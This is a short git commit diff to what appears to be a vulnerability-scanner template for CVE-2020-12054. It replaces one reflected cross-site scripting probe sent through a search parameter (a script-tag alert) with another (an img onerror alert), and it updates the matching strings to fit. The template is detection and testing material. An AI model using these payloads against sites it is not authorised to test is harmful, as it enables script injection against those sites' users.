Update CVE-2020-12054.yaml

patch-1
sandeep 2021-07-19 23:55:15 +05:30
parent 574245af0d
commit 414883f719
1 changed files with 3 additions and 3 deletions

View File

@ -11,13 +11,13 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "</script><script>alert(document.domain)</script>" - "<img src=x onerror=alert(123);>"
- "catch-breadcrumb" - "catch-breadcrumb"
part: body part: body
condition: and condition: and